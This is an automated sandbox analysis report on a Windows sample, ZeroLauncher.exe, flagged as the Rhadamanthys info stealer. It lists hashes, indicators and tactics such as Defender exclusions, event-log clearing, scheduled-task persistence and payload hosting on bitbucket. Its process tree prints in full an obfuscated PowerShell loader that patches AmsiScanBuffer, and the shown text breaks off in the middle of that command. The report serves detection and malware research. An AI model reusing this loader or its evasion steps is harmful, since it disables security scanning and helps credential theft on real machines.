Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
04-10-2024 04:54
Static task
static1
Behavioral task
behavioral1
Sample
ZeroLauncher.exe
Resource
win11-20240802-en
General
-
Target
ZeroLauncher.exe
-
Size
19KB
-
MD5
982e4ae4559538cfb529dfaff0507880
-
SHA1
a3b0e3989d6e40792134286e40448004ebeda077
-
SHA256
95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd
-
SHA512
35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f
-
SSDEEP
384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 2416 created 3328 2416 LicSend.exe 52 PID 2416 created 3328 2416 LicSend.exe 52 PID 2416 created 3328 2416 LicSend.exe 52 PID 2416 created 3328 2416 LicSend.exe 52 PID 2416 created 3328 2416 LicSend.exe 52 PID 3968 created 644 3968 powershell.EXE 5 -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2848 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4884 powershell.exe 5108 powershell.exe 552 powershell.EXE 3968 powershell.EXE -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts LicSend.exe -
Executes dropped EXE 4 IoCs
pid Process 2652 LicenseGet.exe 2100 LicCheck.exe 2416 LicSend.exe 4656 svcupdater.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 bitbucket.org 3 bitbucket.org -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3052 powercfg.exe 3484 cmd.exe 4152 powercfg.exe 3880 powercfg.exe 4860 powercfg.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\svcupdater svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2416 set thread context of 2376 2416 LicSend.exe 107 PID 3968 set thread context of 3068 3968 powershell.EXE 112 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe LicSend.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4720 sc.exe 3132 sc.exe 4768 sc.exe 4000 sc.exe 3312 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LicenseGet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LicCheck.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcupdater.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C3DFD173-3291-4020-B530-AB5A427D5361}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4944 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2848 powershell.exe 2848 powershell.exe 3232 powershell.exe 3232 powershell.exe 2100 LicCheck.exe 2100 LicCheck.exe 2416 LicSend.exe 2416 LicSend.exe 4884 powershell.exe 4884 powershell.exe 2416 LicSend.exe 2416 LicSend.exe 2416 LicSend.exe 2416 LicSend.exe 2416 LicSend.exe 2416 LicSend.exe 5108 powershell.exe 5108 powershell.exe 2416 LicSend.exe 2416 LicSend.exe 3968 powershell.EXE 3968 powershell.EXE 552 powershell.EXE 552 powershell.EXE 3968 powershell.EXE 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4252 ZeroLauncher.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 3232 powershell.exe Token: SeDebugPrivilege 4884 powershell.exe Token: SeShutdownPrivilege 4152 powercfg.exe Token: SeCreatePagefilePrivilege 4152 powercfg.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeShutdownPrivilege 3880 powercfg.exe Token: SeCreatePagefilePrivilege 3880 powercfg.exe Token: SeShutdownPrivilege 4860 powercfg.exe Token: SeCreatePagefilePrivilege 4860 powercfg.exe Token: SeShutdownPrivilege 3052 powercfg.exe Token: SeCreatePagefilePrivilege 3052 powercfg.exe Token: SeIncreaseQuotaPrivilege 5108 powershell.exe Token: SeSecurityPrivilege 5108 powershell.exe Token: SeTakeOwnershipPrivilege 5108 powershell.exe Token: SeLoadDriverPrivilege 5108 powershell.exe Token: SeSystemProfilePrivilege 5108 powershell.exe Token: SeSystemtimePrivilege 5108 powershell.exe Token: SeProfSingleProcessPrivilege 5108 powershell.exe Token: SeIncBasePriorityPrivilege 5108 powershell.exe Token: SeCreatePagefilePrivilege 5108 powershell.exe Token: SeBackupPrivilege 5108 powershell.exe Token: SeRestorePrivilege 5108 powershell.exe Token: SeShutdownPrivilege 5108 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeSystemEnvironmentPrivilege 5108 powershell.exe Token: SeRemoteShutdownPrivilege 5108 powershell.exe Token: SeUndockPrivilege 5108 powershell.exe Token: SeManageVolumePrivilege 5108 powershell.exe Token: 33 5108 powershell.exe Token: 34 5108 powershell.exe Token: 35 5108 powershell.exe Token: 36 5108 powershell.exe Token: SeIncreaseQuotaPrivilege 5108 powershell.exe Token: SeSecurityPrivilege 5108 powershell.exe Token: SeTakeOwnershipPrivilege 5108 powershell.exe Token: SeLoadDriverPrivilege 5108 powershell.exe Token: SeSystemProfilePrivilege 5108 powershell.exe Token: SeSystemtimePrivilege 5108 powershell.exe Token: SeProfSingleProcessPrivilege 5108 powershell.exe Token: SeIncBasePriorityPrivilege 5108 powershell.exe Token: SeCreatePagefilePrivilege 5108 powershell.exe Token: SeBackupPrivilege 5108 powershell.exe Token: SeRestorePrivilege 5108 powershell.exe Token: SeShutdownPrivilege 5108 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeSystemEnvironmentPrivilege 5108 powershell.exe Token: SeRemoteShutdownPrivilege 5108 powershell.exe Token: SeUndockPrivilege 5108 powershell.exe Token: SeManageVolumePrivilege 5108 powershell.exe Token: 33 5108 powershell.exe Token: 34 5108 powershell.exe Token: 35 5108 powershell.exe Token: 36 5108 powershell.exe Token: SeIncreaseQuotaPrivilege 5108 powershell.exe Token: SeSecurityPrivilege 5108 powershell.exe Token: SeTakeOwnershipPrivilege 5108 powershell.exe Token: SeLoadDriverPrivilege 5108 powershell.exe Token: SeSystemProfilePrivilege 5108 powershell.exe Token: SeSystemtimePrivilege 5108 powershell.exe Token: SeProfSingleProcessPrivilege 5108 powershell.exe Token: SeIncBasePriorityPrivilege 5108 powershell.exe Token: SeCreatePagefilePrivilege 5108 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4252 wrote to memory of 2848 4252 ZeroLauncher.exe 78 PID 4252 wrote to memory of 2848 4252 ZeroLauncher.exe 78 PID 2848 wrote to memory of 3232 2848 powershell.exe 80 PID 2848 wrote to memory of 3232 2848 powershell.exe 80 PID 2848 wrote to memory of 2652 2848 powershell.exe 82 PID 2848 wrote to memory of 2652 2848 powershell.exe 82 PID 2848 wrote to memory of 2652 2848 powershell.exe 82 PID 2848 wrote to memory of 2100 2848 powershell.exe 83 PID 2848 wrote to memory of 2100 2848 powershell.exe 83 PID 2848 wrote to memory of 2100 2848 powershell.exe 83 PID 2848 wrote to memory of 2416 2848 powershell.exe 84 PID 2848 wrote to memory of 2416 2848 powershell.exe 84 PID 3484 wrote to memory of 4152 3484 cmd.exe 93 PID 3484 wrote to memory of 4152 3484 cmd.exe 93 PID 3344 wrote to memory of 4720 3344 cmd.exe 94 PID 3344 wrote to memory of 4720 3344 cmd.exe 94 PID 3344 wrote to memory of 3132 3344 cmd.exe 95 PID 3344 wrote to memory of 3132 3344 cmd.exe 95 PID 3484 wrote to memory of 3880 3484 cmd.exe 96 PID 3484 wrote to memory of 3880 3484 cmd.exe 96 PID 3344 wrote to memory of 4768 3344 cmd.exe 97 PID 3344 wrote to memory of 4768 3344 cmd.exe 97 PID 3484 wrote to memory of 4860 3484 cmd.exe 98 PID 3484 wrote to memory of 4860 3484 cmd.exe 98 PID 3344 wrote to memory of 4000 3344 cmd.exe 99 PID 3344 wrote to memory of 4000 3344 cmd.exe 99 PID 3484 wrote to memory of 3052 3484 cmd.exe 100 PID 3484 wrote to memory of 3052 3484 cmd.exe 100 PID 3344 wrote to memory of 3312 3344 cmd.exe 101 PID 3344 wrote to memory of 3312 3344 cmd.exe 101 PID 3344 wrote to memory of 4212 3344 cmd.exe 102 PID 3344 wrote to memory of 4212 3344 cmd.exe 102 PID 3344 wrote to memory of 228 3344 cmd.exe 103 PID 3344 wrote to memory of 228 3344 cmd.exe 103 PID 3344 wrote to memory of 236 3344 cmd.exe 104 PID 3344 wrote to memory of 236 3344 cmd.exe 104 PID 3344 wrote to memory of 2728 3344 cmd.exe 105 PID 3344 wrote to memory of 2728 3344 cmd.exe 105 PID 3344 wrote to memory of 928 3344 cmd.exe 106 PID 3344 wrote to memory of 928 3344 cmd.exe 106 PID 2416 wrote to memory of 2376 2416 LicSend.exe 107 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3968 wrote to memory of 3068 3968 powershell.EXE 112 PID 3068 wrote to memory of 644 3068 dllhost.exe 5 PID 3068 wrote to memory of 704 3068 dllhost.exe 7 PID 3068 wrote to memory of 996 3068 dllhost.exe 12 PID 3068 wrote to memory of 568 3068 dllhost.exe 13 PID 3068 wrote to memory of 1040 3068 dllhost.exe 14 PID 3068 wrote to memory of 1048 3068 dllhost.exe 15 PID 3068 wrote to memory of 1056 3068 dllhost.exe 16 PID 3068 wrote to memory of 1068 3068 dllhost.exe 17 PID 3068 wrote to memory of 1148 3068 dllhost.exe 18 PID 3068 wrote to memory of 1240 3068 dllhost.exe 20 PID 3068 wrote to memory of 1252 3068 dllhost.exe 21 PID 3068 wrote to memory of 1332 3068 dllhost.exe 22 PID 3068 wrote to memory of 1400 3068 dllhost.exe 23 PID 3068 wrote to memory of 1492 3068 dllhost.exe 24 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:644
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:568
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{16c568ad-859b-4e98-a696-079e26fda204}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3068
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:OoMoNckCdKTa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TiMQfqAVAgdDjj,[Parameter(Position=1)][Type]$HhbghgOGii)$vuWolfbRzFC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+'p'+'e',''+'C'+''+'l'+''+'a'+'ss,'+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+'s'+'s'+[Char](44)+''+[Char](65)+'uto'+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$vuWolfbRzFC.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+''+'N'+'ame,Hi'+[Char](100)+'eBy'+[Char](83)+'i'+[Char](103)+','+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TiMQfqAVAgdDjj).SetImplementationFlags('Ru'+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$vuWolfbRzFC.DefineMethod('I'+[Char](110)+'v'+[Char](111)+'ke','P'+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+'a'+[Char](108)+'',$HhbghgOGii,$TiMQfqAVAgdDjj).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $vuWolfbRzFC.CreateType();}$tikQZhgyZzvtj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+'t'+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'cr'+'o'+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](116)+'ik'+'Q'+''+'Z'+''+[Char](104)+'gy'+[Char](90)+''+[Char](122)+''+[Char](118)+'t'+[Char](106)+'');$tSwHRRtrQPlCfm=$tikQZhgyZzvtj.GetMethod(''+'t'+'S'+[Char](119)+''+'H'+''+'R'+'R'+[Char](116)+''+'r'+''+'Q'+''+'P'+''+[Char](108)+''+[Char](67)+'f'+'m'+'',[Reflection.BindingFlags]'P'+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+'t'+''+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eJzcvuchBDLCedjfDPo=OoMoNckCdKTa @([String])([IntPtr]);$MqsjxbDDMdHEZyKYEFkaNV=OoMoNckCdKTa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KEBQyiZfVHJ=$tikQZhgyZzvtj.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$orDAFkbpSsgZiT=$tSwHRRtrQPlCfm.Invoke($Null,@([Object]$KEBQyiZfVHJ,[Object](''+[Char](76)+'o'+'a'+'dLi'+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$GnZMUfwHGMDeKbFnX=$tSwHRRtrQPlCfm.Invoke($Null,@([Object]$KEBQyiZfVHJ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$RoYHSob=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($orDAFkbpSsgZiT,$eJzcvuchBDLCedjfDPo).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+'.d'+[Char](108)+''+[Char](108)+'');$mTavQYKWrySbMCouL=$tSwHRRtrQPlCfm.Invoke($Null,@([Object]$RoYHSob,[Object](''+[Char](65)+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+'Buf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$JyBgUepfnL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GnZMUfwHGMDeKbFnX,$MqsjxbDDMdHEZyKYEFkaNV).Invoke($mTavQYKWryS